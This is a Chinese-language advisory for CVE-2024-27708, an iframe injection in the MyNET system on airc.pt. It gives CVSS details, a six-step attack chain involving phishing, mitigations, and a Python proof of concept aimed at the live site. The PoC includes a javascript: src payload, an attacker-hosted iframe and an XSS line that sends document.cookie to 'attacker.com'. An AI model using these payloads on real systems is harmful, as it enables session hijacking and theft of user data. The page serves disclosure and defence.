CVE-2024-27708 MyNET v.26.06 iframe注入漏洞

漏洞信息

漏洞编号

CVE-2024-27708

漏洞类型

iframe注入

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MyNET (airc.pt)

漏洞概述

CVE-2024-27708是发现于airc.pt网站MyNET系统v.26.06及之前版本中的高危iframe注入漏洞。该漏洞存在于solucoes-servicos.solucoes模块中，攻击者可以通过操控src参数实现恶意iframe注入，从而在受害者浏览器中执行任意代码。由于该漏洞的CVSS评分高达9.6，属于严重级别，对系统和用户安全构成极大威胁。攻击者无需任何认证即可发起攻击，仅需诱导用户访问包含恶意payload的链接即可实现攻击。此类iframe注入漏洞可能导致会话劫持、敏感信息窃取、恶意软件传播等多种危害。

技术细节

该漏洞属于Web应用安全中的iframe注入（iframe injection）类型，攻击原理是利用应用程序对用户输入的src参数缺乏充分的过滤和验证。攻击者构造包含恶意JavaScript代码或钓鱼页面的iframe标签，通过src参数注入到目标页面中。当受害者访问被注入的页面时，恶意iframe会在其浏览器上下文中执行，可能导致：1）窃取用户会话cookie和认证信息；2）植入键盘记录器窃取敏感数据；3）重定向用户到钓鱼网站；4）在后台加载恶意资源。由于该漏洞需要用户交互（UI:R），攻击者通常通过社工手段诱导用户点击恶意链接。在网络攻击场景中，攻击者可结合XSS（跨站脚本攻击）技术进一步扩大攻击面，实现持久化攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点airc.pt使用的MyNET系统版本，确认版本号≤26.06

STEP 2

步骤2: 参数探测

对solucoes-servicos.solucoes页面进行测试，发现src参数存在注入点

STEP 3

步骤3: Payload构造

构造恶意iframe标签或JavaScript payload，通过src参数注入恶意代码

STEP 4

步骤4: 社工诱导

由于需要用户交互，攻击者通过钓鱼邮件或社交工程诱导受害者访问恶意链接

STEP 5

步骤5: 代码执行

受害者浏览器加载注入的恶意iframe，执行攻击者预设的JavaScript代码

STEP 6

步骤6: 权限提升与数据窃取

攻击者通过注入的代码窃取用户会话cookie、敏感信息或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2024-27708 Iframe Injection PoC
# Target: airc.pt MyNET v.26.06 and before

target_url = "https://www.airc.pt/solucoes-servicos/solucoes"

# Malicious iframe payload
malicious_payload = {
    "segment": "MYN",
    "src": "javascript:alert('CVE-2024-27708 Iframe Injection')"
}

# Alternative payload - external iframe injection
malicious_iframe_payload = {
    "segment": "MYN",
    "src": "https://attacker-controlled-site.com/malicious-page.html"
}

try:
    # Test basic injection
    response = requests.get(target_url, params=malicious_payload, timeout=10)
    print(f"[*] Target: {target_url}")
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Payload sent: {malicious_payload}")
    
    if "iframe" in response.text.lower() or response.status_code == 200:
        print("[+] Potential iframe injection detected")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# XSS to RCE chain payload
xss_payload = {
    "segment": "MYN",
    "src": "><img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie>"
}

影响范围

MyNET v.26.06及之前所有版本

防御指南

临时缓解措施

在官方修复版本发布前，建议采取以下临时缓解措施：1）禁用或限制solucoes-servicos模块的外部参数输入；2）通过WAF规则拦截包含iframe、script、javascript等关键字的请求；3）配置严格的CSP策略防止恶意iframe加载；4）监控Web服务器日志及时发现异常请求模式；5）对管理后台实施额外的访问控制和多因素认证。